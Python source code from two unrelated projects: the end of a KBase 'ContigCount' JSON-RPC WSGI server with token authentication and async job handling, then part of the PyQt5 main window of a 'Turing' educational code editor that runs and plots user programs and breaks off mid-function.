message) def log_debug(self, message, level=1): if level in self._debug_levels: pass else: level = int(level) if level < 1 or level > 3: raise ValueError("Illegal log level: " + str(level)) level = level + 6 self._log(level, message) def set_log_level(self, level): self._logger.set_log_level(level) def get_log_level(self): return self._logger.get_log_level() def clear_log_level(self): self._logger.clear_user_log_level() def _log(self, level, message): self._logger.log_message(level, message, self['client_ip'], self['user_id'], self['module'], self['method'], self['call_id']) def getIPAddress(environ): xFF = environ.get('HTTP_X_FORWARDED_FOR') realIP = environ.get('HTTP_X_REAL_IP') trustXHeaders = config is None or \ config.get('dont_trust_x_ip_headers') != 'true' if (trustXHeaders): if (xFF): return xFF.split(',')[0].strip() if (realIP): return realIP.strip() return environ.get('REMOTE_ADDR') class Application(object): # Wrap the wsgi handler in a class definition so that we can # do some initialization and avoid regenerating stuff over # and over def logcallback(self): self.serverlog.set_log_file(self.userlog.get_log_file()) def log(self, level, context, message): self.serverlog.log_message(level, message, context['client_ip'], context['user_id'], context['module'], context['method'], context['call_id']) def __init__(self): submod = get_service_name() or 'ContigCount' self.userlog = log.log( submod, ip_address=True, authuser=True, module=True, method=True, call_id=True, changecallback=self.logcallback, config=get_config_file()) self.serverlog = log.log( submod, ip_address=True, authuser=True, module=True, method=True, call_id=True, logfile=self.userlog.get_log_file()) self.serverlog.set_log_level(6) self.rpc_service = JSONRPCServiceCustom() self.method_authentication = dict() self.rpc_service.add(impl_ContigCount.count_contigs, name='ContigCount.count_contigs', types=[basestring, basestring]) self.method_authentication['ContigCount.count_contigs'] = 'required' self.auth_client = biokbase.nexus.Client( config={'server': 'nexus.api.globusonline.org', 'verify_ssl': True, 'client': None, 'client_secret': None}) def __call__(self, environ, start_response): # Context object, equivalent to the perl impl CallContext ctx = MethodContext(self.userlog) ctx['client_ip'] = getIPAddress(environ) status = '500 Internal Server Error' try: body_size = int(environ.get('CONTENT_LENGTH', 0)) except (ValueError): body_size = 0 if environ['REQUEST_METHOD'] == 'OPTIONS': # we basically do nothing and just return headers status = '200 OK' rpc_result = "" else: request_body = environ['wsgi.input'].read(body_size) try: req = json.loads(request_body) except ValueError as ve: err = {'error': {'code': -32700, 'name': "Parse error", 'message': str(ve), } } rpc_result = self.process_error(err, ctx, {'version': '1.1'}) else: ctx['module'], ctx['method'] = req['method'].split('.') ctx['call_id'] = req['id'] ctx['rpc_context'] = {'call_stack': [{'time':self.now_in_utc(), 'method': req['method']}]} try: token = environ.get('HTTP_AUTHORIZATION') # parse out the method being requested and check if it # has an authentication requirement method_name = req['method'] if method_name in async_run_methods: method_name = async_run_methods[method_name][0] + "." + async_run_methods[method_name][1] if method_name in async_check_methods: method_name = async_check_methods[method_name][0] + "." + async_check_methods[method_name][1] auth_req = self.method_authentication.get(method_name, "none") if auth_req != "none": if token is None and auth_req == 'required': err = ServerError() err.data = "Authentication required for " + \ "ContigCount but no authentication header was passed" raise err elif token is None and auth_req == 'optional': pass else: try: user, _, _ = \ self.auth_client.validate_token(token) ctx['user_id'] = user ctx['authenticated'] = 1 ctx['token'] = token except Exception, e: if auth_req == 'required': err = ServerError() err.data = \ "Token validation failed: %s" % e raise err if (environ.get('HTTP_X_FORWARDED_FOR')): self.log(log.INFO, ctx, 'X-Forwarded-For: ' + environ.get('HTTP_X_FORWARDED_FOR')) method_name = req['method'] if method_name in async_run_methods or method_name in async_check_methods: if method_name in async_run_methods: orig_method_pair = async_run_methods[method_name] else: orig_method_pair = async_check_methods[method_name] orig_method_name = orig_method_pair[0] + '.' + orig_method_pair[1] if 'required' != self.method_authentication.get(orig_method_name, 'none'): err = ServerError() err.data = 'Async method ' + orig_method_name + ' should require ' + \ 'authentication, but it has authentication level: ' + \ self.method_authentication.get(orig_method_name, 'none') raise err job_service_client = AsyncJobServiceClient(token = ctx['token']) if method_name in async_run_methods: run_job_params = { 'method': orig_method_name, 'params': req['params']} if 'rpc_context' in ctx: run_job_params['rpc_context'] = ctx['rpc_context'] job_id = job_service_client.run_job(run_job_params) respond = {'version': '1.1', 'result': [job_id], 'id': req['id']} rpc_result = json.dumps(respond, cls=JSONObjectEncoder) status = '200 OK' else: job_id = req['params'][0] job_state = job_service_client.check_job(job_id) finished = job_state['finished'] if finished != 0 and 'error' in job_state and job_state['error'] is not None: err = {'error': job_state['error']} rpc_result = self.process_error(err, ctx, req, None) else: respond = {'version': '1.1', 'result': [job_state], 'id': req['id']} rpc_result = json.dumps(respond, cls=JSONObjectEncoder) status = '200 OK' elif method_name in sync_methods or (method_name + '_async') not in async_run_methods: self.log(log.INFO, ctx, 'start method') rpc_result = self.rpc_service.call(ctx, req) self.log(log.INFO, ctx, 'end method') status = '200 OK' else: err = ServerError() err.data = 'Method ' + method_name + ' cannot be run synchronously' raise err except JSONRPCError as jre: err = {'error': {'code': jre.code, 'name': jre.message, 'message': jre.data } } trace = jre.trace if hasattr(jre, 'trace') else None rpc_result = self.process_error(err, ctx, req, trace) except Exception, e: err = {'error': {'code': 0, 'name': 'Unexpected Server Error', 'message': 'An unexpected server error ' + 'occurred', } } rpc_result = self.process_error(err, ctx, req, traceback.format_exc()) # print 'The request method was %s\n' % environ['REQUEST_METHOD'] # print 'The environment dictionary is:\n%s\n' % pprint.pformat(environ) @IgnorePep8 # print 'The request body was: %s' % request_body # print 'The result from the method call is:\n%s\n' % \ # pprint.pformat(rpc_result) if rpc_result: response_body = rpc_result else: response_body = '' response_headers = [ ('Access-Control-Allow-Origin', '*'), ('Access-Control-Allow-Headers', environ.get( 'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')), ('content-type', 'application/json'), ('content-length', str(len(response_body)))] start_response(status, response_headers) return [response_body] def process_error(self, error, context, request, trace=None): if trace: self.log(log.ERR, context, trace.split('\n')[0:-1]) if 'id' in request: error['id'] = request['id'] if 'version' in request: error['version'] = request['version'] if 'error' not in error['error'] or error['error']['error'] is None: error['error']['error'] = trace elif 'jsonrpc' in request: error['jsonrpc'] = request['jsonrpc'] error['error']['data'] = trace else: error['version'] = '1.0' error['error']['error'] = trace return json.dumps(error) def now_in_utc(self): # Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone dtnow = datetime.datetime.now() dtutcnow = datetime.datetime.utcnow() delta = dtnow - dtutcnow hh,mm = divmod((delta.days * 24*60*60 + delta.seconds + 30) // 60, 60) return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm) application = Application() # This is the uwsgi application dictionary. On startup uwsgi will look # for this dict and pull its configuration from here. # This simply lists where to "mount" the application in the URL path # # This uwsgi module "magically" appears when running the app within # uwsgi and is not available otherwise, so wrap an exception handler # around it # # To run this server in uwsgi with 4 workers listening on port 9999 use: # uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_ # To run a using the single threaded python BaseHTTP service # listening on port 9999 by default execute this file # try: import uwsgi # Before we do anything with the application, see if the # configs specify patching all std routines to be asynch # *ONLY* use this if you are going to wrap the service in # a wsgi container that has enabled gevent, such as # uwsgi with the --gevent option if config is not None and config.get('gevent_monkeypatch_all', False): print "Monkeypatching std libraries for async" from gevent import monkey monkey.patch_all() uwsgi.applications = { '': application } except ImportError: # Not available outside of wsgi, ignore pass _proc = None def start_server(host='localhost', port=0, newprocess=False): ''' By default, will start the server on localhost on a system assigned port in the main thread. Excecution of the main thread will stay in the server main loop until interrupted. To run the server in a separate process, and thus allow the stop_server method to be called, set newprocess = True. This will also allow returning of the port number.''' global _proc if _proc: raise RuntimeError('server is already running') httpd = make_server(host, port, application) port = httpd.server_address[1] print "Listening on port %s" % port if newprocess: _proc = Process(target=httpd.serve_forever) _proc.daemon = True _proc.start() else: httpd.serve_forever() return port def stop_server(): global _proc _proc.terminate() _proc = None def process_async_cli(input_file_path, output_file_path, token): exit_code = 0 with open(input_file_path) as data_file: req = json.load(data_file) if 'version' not in req: req['version'] = '1.1' if 'id' not in req: req['id'] = str(_random.random())[2:] ctx = MethodContext(application.userlog) if token: user, _, _ = application.auth_client.validate_token(token) ctx['user_id'] = user ctx['authenticated'] = 1 ctx['token'] = token if 'context' in req: ctx['rpc_context'] = req['context'] ctx['CLI'] = 1 resp = None try: resp = application.rpc_service.call_py(ctx, req) except JSONRPCError as jre: trace = jre.trace if hasattr(jre, 'trace') else None resp = {'id': req['id'], 'version': req['version'], 'error': {'code': jre.code, 'name': jre.message, 'message': jre.data, 'error': trace} } except Exception, e: trace = traceback.format_exc() resp = {'id': req['id'], 'version': req['version'], 'error': {'code': 0, 'name': 'Unexpected Server Error', 'message': 'An unexpected server error occurred', 'error': trace} } if 'error' in resp: exit_code = 500 with open(output_file_path, "w") as f: f.write(json.dumps(resp, cls=JSONObjectEncoder)) return exit_code if __name__ == "__main__": if len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1]): token = None if len(sys.argv) == 4: if os.path.isfile(sys.argv[3]): with open(sys.argv[3]) as token_file: token = token_file.read() else: token = sys.argv[3] sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token)) try: opts, args = getopt(sys.argv[1:], "", ["port=", "host="]) except GetoptError as err: # print help information and exit: print str(err) # will print something like "option -a not recognized" sys.exit(2) port = 9999 host = 'localhost' for o, a in opts: if o == '--port': port = int(a) elif o == '--host': host = a print "Host set to %s" % host else: assert False, "unhandled option" start_server(host=host, port=port) # print "Listening on port %s" % port # httpd = make_server( host, port, application) # # httpd.serve_forever()
mainwindow.py
# -*- coding: utf-8 -*- from util.profiler import pf_point, pf_end import html import json import os import re import runpy import sys import tempfile import threading from datetime import datetime import numpy as np import pygments.styles from PyQt5.QtGui import * from matplotlib.axes import Axes from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas from matplotlib.figure import Figure from matplotlib.ticker import AutoLocator, LinearLocator import pyqode.python.backend import util.code import util.html from algo.stmts import * from lang import translator from maths.nodes import * from maths.parser import quick_parse as parse from pyqode.core import api from pyqode.core import modes from pyqode.core import panels from util import first_found_dir from util import theming, show_error from util.widgets import * translate = QCoreApplication.translate class AppState(): current_file: Optional[str] = None can_save = False autosave_timer: QTimer = None mode_python = False app_started = False algo = BlockStmt([]) new_version = False async_import_table = {} def async_import(module): def runner(): globals()[module] = __import__(module) async_import_table[module] = threading.Thread(target=runner, args=()) async_import_table[module].start() def async_imported(module): return not async_import_table[module].is_alive() class GuiState(): window: QMainWindow = None ui = None code_editor: api.CodeEdit = None plot_canvas: FigureCanvas = None plot_figure: Figure = None plot_axes: Axes = None panel_search: panels.SearchAndReplacePanel = None syntax_highlighter: modes.PygmentsSyntaxHighlighter = None algo_base_font: QFont = None editor_action_table = [ ("Copy", "copy"), ("Cut", "cut"), ("Paste", "paste"), ("Undo", "undo"), ("Redo", "redo"), ("SelectAll", "select_all"), ("DuplicateLine", "duplicate_line"), ("Indent", "indent"), ("Unindent", "un_indent"), ("GoToLine", "goto_line"), ("Find", "Search"), ("Replace", "ActionSearchAndReplace"), ("FindPrevious", "FindPrevious"), ("FindNext", "FindNext"), ("ZoomIn", "zoom_in"), ("ZoomOut", "zoom_out"), ("ResetZoom", "reset_zoom") ] python_only = [ "SelectAll", "Find", "FindPrevious", "FindNext", "Replace", "Indent", "Unindent", "GoToLine" ] algo_only = [ "Debug", "Step", "ConvertToPython" ] filters = {} lng_actions = {} item_map = {} root_item: QTreeWidgetItem = None mode_zoom: modes.ZoomMode = None mode_ext_select: modes.ExtendedSelectionMode = None panel_folding: panels.FoldingPanel = None article_load_widgets = None class ExecState(): stop_flag = False running = False run_started: datetime = None skip_step = False stopped = False last_saved = None current_stmt: BaseStmt = None python_stopped = False recent_actions = None recent_buttons = None article_buttons = None article_list = None current_output = "" after_output = "" user_input: str = None worker = None block_html = lambda: '<span style="color:%s;font-weight:bold">' % theming.algo_colors[0] comment_html = lambda: '<span style="color:%s;font-style:italic">' % theming.algo_colors[1] keyword_html = lambda: '<span style="color:%s;font-weight:bold">' % theming.algo_colors[2] red_html = lambda: '<span style="color:%s">' % theming.algo_colors[3] label_format = "&nbsp;<span>%s</span>" + "&nbsp;" * 10 def sleep(duration): begin = datetime.datetime.now() while (datetime.datetime.now() - begin).total_seconds() < duration: check_stop() QCoreApplication.processEvents() def sleep_seconds(duration): sleep(float(duration)) plot_update() def is_empty(): if AppState.mode_python: return not GuiState.code_editor.toPlainText() else: return AppState.algo.children == [] def is_modified(): if AppState.mode_python: return GuiState.code_editor.toPlainText() != ExecState.last_saved else: return repr(AppState.algo) != ExecState.last_saved def handler_ClearRecent(): util.settings.setValue("recent", json.dumps([])) recent_update_text() def recent_add(path): recent = json.loads(util.settings.value("recent", "[]")) recent.insert(0, path) recent = sorted(list(set(recent)))[0:10] util.settings.setValue("recent", json.dumps(recent)) recent_update_text() def recent_update_text(): recent = json.loads(util.settings.value("recent", "[]")) recent = [f for f in recent if os.path.isfile(f)] util.settings.setValue("recent", json.dumps(recent)) for i, file in enumerate(recent): ExecState.recent_actions[i].setText(os.path.basename(file)) ExecState.recent_buttons[i].setText(os.path.basename(file)) _, ext = os.path.splitext(file.lower()) if ext == ".alg": icon = QIcon(":/action/media/algobox.ico") elif ext == ".tr": icon = GuiState.ui.tabWidget.tabIcon(1) elif ext == ".py": icon = GuiState.ui.tabWidget.tabIcon(2) else: icon = QIcon() ExecState.recent_actions[i].setIcon(icon) ExecState.recent_buttons[i].setIcon(icon) ExecState.recent_actions[i].setVisible(True) ExecState.recent_buttons[i].setVisible(i < 7) for i in range(len(recent), 10): ExecState.recent_actions[i].setVisible(False) ExecState.recent_buttons[i].setVisible(False) ExecState.recent_actions[i].setIcon(QIcon()) ExecState.recent_buttons[i].setIcon(QIcon()) fix_qt_shitty_margins() def recent_clicked(index): recent = json.loads(util.settings.value("recent", "[]")) if index < len(recent) and recent[index]: load_file(recent[index]) def recent_init_actions(): ExecState.recent_actions = [] ExecState.recent_buttons = [] def generator(num): return lambda: recent_clicked(num) for i in range(10): act = QAction(GuiState.window) act.setVisible(False) act.triggered.connect(generator(i)) ExecState.recent_actions.append(act) GuiState.ui.menuRecent.insertAction(GuiState.ui.actionClearRecent, act) btn = QFlatButton(GuiState.window) btn.setVisible(False) btn.clicked.connect(generator(i)) ExecState.recent_buttons.append(btn) GuiState.ui.verticalLayout_10.addWidget(btn) GuiState.ui.menuRecent.insertSeparator(GuiState.ui.actionClearRecent) GuiState.ui.verticalLayout_10.addItem(QSpacerItem(1, 2, QSizePolicy.Minimum, QSizePolicy.Expanding)) recent_update_text() def article_clicked(i): QDesktopServices.openUrl(QUrl(ExecState.article_list[i][1])) def article_fetch(language): import urllib.request from xml.etree import ElementTree response = urllib.request.urlopen( urllib.request.Request("https://turingapp.ml/%s/feed/" % language, headers={'User-Agent': 'Mozilla/5.0'})) xml = ElementTree.fromstring(response.read()) result = [] for elem in xml[0].iter("item"): result.append((elem.find("title").text, elem.find("link").text)) return result def article_init_actions(update=True): ExecState.article_buttons = [] ExecState.article_list = [] def generator(i): return lambda: article_clicked(i) for i in range(7): btn = QFlatButton(GuiState.window) btn.setVisible(False) btn.clicked.connect(generator(i)) ExecState.article_buttons.append(btn) GuiState.ui.verticalLayout_11.addWidget(btn) GuiState.ui.verticalLayout_11.addItem(QSpacerItem(1, 2, QSizePolicy.Minimum, QSizePolicy.Expanding)) if update: return article_update_text_begin() def article_remove_button(): if GuiState.article_load_widgets is not None: GuiState.ui.verticalLayout_11.removeWidget(GuiState.article_load_widgets[0]) GuiState.article_load_widgets[0].deleteLater() GuiState.ui.verticalLayout_11.removeItem(GuiState.article_load_widgets[1]) GuiState.article_load_widgets = None for btn in ExecState.article_buttons: btn.setVisible(False) def article_init_button(): article_remove_button() btn = QFlatButton(GuiState.window) spacer = QSpacerItem(1, 2, QSizePolicy.Minimum, QSizePolicy.Expanding) GuiState.article_load_widgets = (btn, spacer) def handler(): set_load_recent_articles(True) article_update_text_begin(True) btn.setIcon(QIcon(":/action/media/download.png")) btn.setText(translate("MainWindow", "Load recent articles")) btn.clicked.connect(handler) GuiState.ui.verticalLayout_11.addWidget(btn) GuiState.ui.verticalLayout_11.addItem(spacer) def article_loader(): ExecState.article_list = article_fetch(translator.current_lang) or article_fetch("") def article_update_text_begin(both=False): article_remove_button() thr = threading.Thread(target=article_loader, args=()) thr.start() if both: article_update_text_end(thr) else: return thr def article_update_text_end(thr=None): if thr is not None: while thr.is_alive(): QCoreApplication.processEvents() for i, (name, _) in enumerate(ExecState.article_list): ExecState.article_buttons[i].setText(name) ExecState.article_buttons[i].setVisible(True) for i in range(len(ExecState.article_list), 7): ExecState.article_buttons[i].setVisible(False) class MainWindowWrapper(QMainWindow): def closeEvent(self, event): if not is_modified(): event.setAccepted(True) clean_exit() return msg = msg_box(translate("MainWindow", "Do you really want to exit?\nAll unsaved changes will be lost."), parent=self) event.ignore() if msg.exec_() == QMessageBox.Yes: event.setAccepted(True) clean_exit() def get_action(name: str) -> QAction: return getattr(GuiState.ui, "action" + name) def refresh(): plot_update() refresh_buttons_status() if not AppState.mode_python: refresh_algo() algo_sel_changed() refresh_window_title() def refresh_window_title(): if GuiState.ui.tabWidget.currentIndex() == 0: title = "Turing" else: if AppState.current_file: filename = os.path.basename(AppState.current_file) if is_modified(): title = translate("MainWindow", "Turing - {file} (unsaved)").format(file=filename) else: title = translate("MainWindow", "Turing - {file}").format(file=filename) else: title = translate("MainWindow", "Turing - New File") GuiState.window.setWindowTitle(title) def refresh_buttons_status(): if AppState.mode_python: for ours, theirs in GuiState.editor_action_table: get_action(ours).setEnabled(getattr(GuiState.code_editor, "action_" + theirs).isEnabled()) active_code = True for c in [ "Save", "SaveAs", "Print", "Find", "Replace", "Run", "Step", "ConvertToPython" ]: get_action(c).setEnabled(active_code) for c in GuiState.python_only: get_action(c).setVisible(AppState.mode_python) for c in GuiState.algo_only: get_action(c).setVisible(not AppState.mode_python) # if AppState.current_file != -1: # get_action("Undo").setEnabled(undo_objs[AppState.current_file].can_undo()) # get_action("Redo").setEnabled(undo_objs[AppState.current_file].can_redo()) def handler_Undo(): if AppState.mode_python: GuiState.code_editor.undo() def handler_Redo(): if AppState.mode_python: GuiState.code_editor.redo() def handler_SelectAll(): GuiState.code_editor.selectAll() def handler_Cut(): if AppState.mode_python: GuiState.code_editor.cut() def handler_Copy(): if AppState.mode_python: GuiState.code_editor.copy() def handler_Paste(): if AppState.mode_python: GuiState.code_editor.paste() def handler_DuplicateLine(): if AppState.mode_python: GuiState.code_editor.duplicate_line() else: btn_dupl_line() def handler_Indent(): GuiState.code_editor.indent() def handler_Unindent(): GuiState.code_editor.un_indent() def handler_GoToLine(): GuiState.code_editor.goto_line() def handler_Find(): GuiState.panel_search.on_search() def handler_FindPrevious(): GuiState.panel_search.select_previous() def handler_FindNext(): GuiState.panel_search.select_next() def handler_Replace(): GuiState.panel_search.on_search_and_replace() def handler_Calculator(): from forms import calculator calculator.CalculatorWindow() def handler_ChangTheme(): from forms import changtheme backup = util.settings.value("app_theme") dlg = changtheme.ChangeThemeWindow(GuiState.window, theming.themes[backup][1]) dlg.theme_callback = lambda: set_theme("custom") if dlg.run(): util.settings.setValue("custom_theme", theming.themes["custom"][1]) for act in GuiState.ui.menuChangeTheme.actions(): if act.statusTip() == "custom": act.setVisible(True) break else: set_theme(backup) def handler_HelpContents(): from forms import help help.HelpWindow(GuiState.window) def change_tab(): if GuiState.ui.tabWidget.currentIndex() == 1: AppState.mode_python = False elif GuiState.ui.tabWidget.currentIndex() == 2: AppState.mode_python = True refresh() def python_print(*args, end="\n"): ExecState.current_output += html.escape(" ".join(str(arg) for arg in args)) ExecState.current_output += end update_output() def update_output(): GuiState.ui.txtOutput.setHtml( '<pre style="margin: 0">%s</pre>' % (ExecState.current_output + ExecState.after_output)) GuiState.ui.txtOutput.moveCursor(QTextCursor.End) GuiState.ui.txtOutput.ensureCursorVisible() if ExecState.current_output.endswith("\n\n"): ExecState.current_output = ExecState.current_output[:-1] plot_update() def check_stop(): if ExecState.stopped or (not AppState.mode_python and ExecState.worker.finished): raise KeyboardInterrupt() def python_input(prompt="", globals=None, locals=None, unsafe=False): python_print(prompt, end="") plot_update() ExecState.after_output = "<hr>" ExecState.after_output += util.html.centered( "<h3>%s</h3>" % util.html.color_span("<i>%s</i>" % translate("MainWindow", "Input: ") + html.escape(prompt), "red")) update_output() GuiState.ui.btnSendInput.setEnabled(True) GuiState.ui.txtInput.setEnabled(True) GuiState.ui.txtInput.setFocus(Qt.OtherFocusReason) for n in range(3): if not GuiState.ui.txtInput.text(): GuiState.ui.txtInput.setStyleSheet("QLineEdit { background-color: #ffbaba; }") sleep(0.050) GuiState.ui.txtInput.setStyleSheet("QLineEdit { background-color: #ff7b7b; }") sleep(0.050) GuiState.ui.txtInput.setStyleSheet("QLineEdit { background-color: #ff5252; }") sleep(0.050) GuiState.ui.txtInput.setStyleSheet("QLineEdit { background-color: #ff7b7b; }") sleep(0.050) GuiState.ui.txtInput.setStyleSheet("QLineEdit { background-color: #ffbaba; }") sleep(0.050) GuiState.ui.txtInput.setStyleSheet("") sleep(0.200) ExecState.user_input = None while ExecState.user_input is None: check_stop() QCoreApplication.processEvents() GuiState.ui.btnSendInput.setEnabled(False) GuiState.ui.txtInput.setEnabled(False) GuiState.ui.txtInput.setText("") ExecState.after_output = "" python_print(ExecState.user_input) update_output() if unsafe: try: evaled = eval(ExecState.user_input, globals, locals) return evaled except: pass try: to_int = int(ExecState.user_input) return to_int except: pass try: to_float = float(ExecState.user_input) return to_float except: pass if unsafe: try: to_complex = complex(ExecState.user_input) return to_complex except: pass return ExecState.user_input def python_print_error(msg, end="\n"): ExecState.current_output += util.html.color_span(msg, "red") + end if not AppState.mode_python: set_current_line(ExecState.worker.last, True) update_output() def plot_update(): if GuiState.plot_axes is not None and GuiState.plot_canvas is not None: GuiState.plot_axes.grid(linestyle='-') GuiState.plot_canvas.draw() def plot_clear(): GuiState.plot_axes.clear() GuiState.plot_axes.axhline(y=0, color='k') GuiState.plot_axes.axvline(x=0, color='k') def plot_reset(): plot_clear() plot_window(-10, 10, -10, 10) plot_update() def plot_window(xmin, xmax, ymin, ymax, xgrad=0, ygrad=0): GuiState.plot_axes.set_xlim(xmin, xmax) GuiState.plot_axes.set_ylim(ymin, ymax) GuiState.plot_axes.get_xaxis().set_major_locator( AutoLocator() if xgrad == 0 else LinearLocator(abs(int((xmax - xmin) / xgrad)) + 1)) GuiState.plot_axes.get_yaxis().set_major_locator( AutoLocator() if ygrad == 0 else LinearLocator(abs(int((ymax - ymin) / ygrad)) + 1)) def plot_point(x, y, color="red"): GuiState.plot_axes.scatter([x], [y], c=color) def plot_line(startx, starty, endx, endy, color="red"): GuiState.plot_axes.plot([startx, endx], [starty, endy], c=color, linestyle="-", marker="o") def plot_function(func, start, end, step, color="red"): domain = [x.item() for x in np.arange(start, end, step)] results = [func(x) for x in domain] GuiState.plot_axes.plot(domain, results, c=color, linestyle="-") def stmt_GClear(stmt: GClearStmt): plot_clear() def stmt_GWindow(stmt: GWindowStmt): plot_window(ExecState.worker.evaluator.eval_node(stmt.x_min), ExecState.worker.evaluator.eval_node(stmt.x_max), ExecState.worker.evaluator.eval_node(stmt.y_min), ExecState.worker.evaluator.eval_node(stmt.y_max), ExecState.worker.evaluator.eval_node(stmt.x_grad), ExecState.worker.evaluator.eval_node(stmt.y_grad)) def stmt_GPoint(stmt: GPointStmt): plot_point(ExecState.worker.evaluator.eval_node(stmt.x), ExecState.worker.evaluator.eval_node(stmt.y), ExecState.worker.evaluator.eval_node(stmt.color)) def stmt_GLine(stmt: GLineStmt): plot_line(ExecState.worker.evaluator.eval_node(stmt.start_x), ExecState.worker.evaluator.eval_node(stmt.start_y), ExecState.worker.evaluator.eval_node(stmt.end_x), ExecState.worker.evaluator.eval_node(stmt.end_y), ExecState.worker.evaluator.eval_node(stmt.color)) def stmt_GFunc(stmt: GFuncStmt): plot_function(ExecState.worker.evaluator.eval_node(stmt.get_function()), ExecState.worker.evaluator.eval_node(stmt.start), ExecState.worker.evaluator.eval_node(stmt.end), ExecState.worker.evaluator.eval_node(stmt.step), ExecState.worker.evaluator.eval_node(stmt.color)) def stmt_Sleep(stmt: SleepStmt): sleep_seconds(ExecState.worker.evaluator.eval_node(stmt.duration)) def init_worker(): from algo.worker import Worker ExecState.worker = Worker(AppState.algo.children) ExecState.worker.callback_print = python_print ExecState.worker.callback_input = python_input ExecState.worker.log.set_callback(python_print_error) ExecState.worker.log.use_prefix = False ExecState.worker.init() ExecState.worker.callback_stop = callback_stop ExecState.worker.map[GClearStmt] = stmt_GClear ExecState.worker.map[GWindowStmt] = stmt_GWindow ExecState.worker.map[GPointStmt] = stmt_GPoint ExecState.worker.map[GLineStmt] = stmt_GLine ExecState.worker.map[GFuncStmt] = stmt_GFunc ExecState.worker.map[SleepStmt] = stmt_Sleep set_current_line(None) plot_reset() def end_output(): ExecState.current_output += util.html.centered( util.html.color_span(translate("MainWindow", "end of output") if ExecState.run_started is None else translate("MainWindow", "end of output [{time}]").format( time=datetime.datetime.now() - ExecState.run_started), "red")) ExecState.current_output += "<hr />\n" ExecState.run_started = None update_output() def set_current_line(current: Optional[BaseStmt], error=False): for item, stmt in GuiState.item_map.values(): if stmt == current: item.setBackground(0, QBrush(QColor("#ef5350") if error else QColor("#fdd835"))) else: item.setBackground(0, GuiState.root_item.background(0)) def callback_stop(stmt, virtual=False): breakpoint_message(ExecState.worker.evaluator.eval_node(stmt.message)) if not virtual: ExecState.worker.finished = True def breakpoint_message(message=""): ExecState.after_output = "<hr>" ExecState.after_output += util.html.centered( "<h3>%s</h3>" % util.html.color_span("<i>%s</i>" % ( translate("MainWindow", "Breakpoint: ") + html.escape(str(message)) if message else translate("MainWindow", "Breakpoint")), "red")) update_output() def python_breakpoint(message=""): breakpoint_message(message) ExecState.python_stopped = True GuiState.ui.actionRun.setDisabled(False) GuiState.ui.actionStop.setDisabled(False) while ExecState.python_stopped and not ExecState.stopped: QCoreApplication.processEvents() if ExecState.stopped: raise KeyboardInterrupt() ExecState.after_output = "" update_output() GuiState.ui.actionRun.setDisabled(True) GuiState.ui.actionStop.setDisabled(True) def handler_Stop(): python_print_error(translate("MainWindow", "program interrupted")) ExecState.after_output = "" ExecState.stopped = True if AppState.mode_python: ExecState.running = False ExecState.python_stopped = False else: ExecState.running = True ExecState.worker.finished = True ExecState.worker.error = False ExecState.stop_flag = True handler_Step() ExecState.stop_flag = False update_output() def handler_Step(): GuiState.ui.actionNew.setDisabled(True) GuiState.ui.actionOpen.setDisabled(True) GuiState.ui.actionRun.setDisabled(True) GuiState.ui.actionDebug.setDisabled(True) GuiState.ui.actionStep.setDisabled(True) GuiState.ui.actionStop.setEnabled(True) try: if AppState.mode_python: pass else: if not ExecState.stopped: if ExecState.running: if ExecState.skip_step: ExecState.skip_step = False ExecState.after_output = "" update_output() else: if isinstance(ExecState.current_stmt, StopStmt): callback_stop(ExecState.current_stmt, True) ExecState.skip_step = True else: ExecState.worker.exec_stmt(ExecState.current_stmt) else: init_worker() ExecState.running = True if not ExecState.skip_step and not ExecState.worker.error: ExecState.current_stmt = ExecState.worker.next_stmt() set_current_line(ExecState.current_stmt) else: ExecState.stopped = False QCoreApplication.processEvents() plot_update() except: show_error() finally: plot_update() if ExecState.worker.finished: GuiState.ui.actionRun.setDisabled(False) if not ExecState.stop_flag: end_output() if not ExecState.worker.error: set_current_line(None) ExecState.running = False GuiState.ui.actionDebug.setDisabled(False) GuiState.ui.actionStep.setDisabled(False) GuiState.ui.actionNew.setDisabled(not ExecState.worker.finished) GuiState.ui.actionOpen.setDisabled(not ExecState.worker.finished) GuiState.ui.actionStop.setEnabled(not ExecState.worker.finished) def handler_Debug(): handler_Run(True) class compat_list(list): def __init__(self, iterable=()): super().__init__(iterable) def __setitem__(self, key, value): while len(self) <= key: self.append(0) super().__setitem__(key, value) def handler_Run(flag=False): if ExecState.python_stopped: ExecState.python_stopped = False return if not flag and not AppState.mode_python: algo_run_python() return GuiState.ui.actionNew.setDisabled(True) GuiState.ui.actionOpen.setDisabled(True) GuiState.ui.actionRun.setDisabled(True) GuiState.ui.actionDebug.setDisabled(True) GuiState.ui.actionStep.setDisabled(True) GuiState.ui.actionStop.setEnabled(True) user_stop = False set_current_line(None) try: if AppState.mode_python: file = tempfile.NamedTemporaryFile(mode="w+b", suffix=".py", delete=False) try: code = util.code.python_wrapper(GuiState.code_editor.toPlainText()).encode("utf8") file.write(code) file.close() ExecState.running = True ExecState.stopped = False ExecState.python_stopped = False plot_reset() ExecState.run_started = datetime.datetime.now() runpy.run_path(file.name, init_globals={ "print": python_print, "input": python_input, "breakpoint": python_breakpoint, "list": compat_list, "sleep": sleep_seconds, "g_clear": plot_clear, "g_window": plot_window, "g_point": plot_point, "g_line": plot_line, "g_func": plot_function, "plot": GuiState.plot_axes }) plot_update() except SyntaxError as err: msg = translate("MainWindow", "Syntax error ({type}) at line {line}, offset {off}: ").format( type=type(err).__name__, line=err.lineno - util.code.line_offset, off=err.offset) python_print_error(msg + html.escape(err.text), end="") python_print_error(" " * (len(msg) + err.offset - 1) + "↑") except KeyboardInterrupt: pass except: python_print_error(html.escape(str(sys.exc_info()[1]))) finally: os.unlink(file.name) plot_update() else: if not ExecState.running: init_worker() plot_reset() ExecState.worker.break_on_error = True ExecState.running = True ExecState.stopped = False ExecState.run_started = datetime.datetime.now() ExecState.skip_step = False else: if ExecState.skip_step: ExecState.skip_step = False ExecState.after_output = "" update_output() else: ExecState.worker.exec_stmt(ExecState.current_stmt) if not ExecState.worker.error: set_current_line(None) while not ExecState.worker.finished: ExecState.worker.step() QCoreApplication.processEvents() except KeyboardInterrupt: user_stop = True except: show_error() finally: plot_update() if not AppState.mode_python and ExecState.worker.stopped: GuiState.ui.actionStep.setDisabled(False) 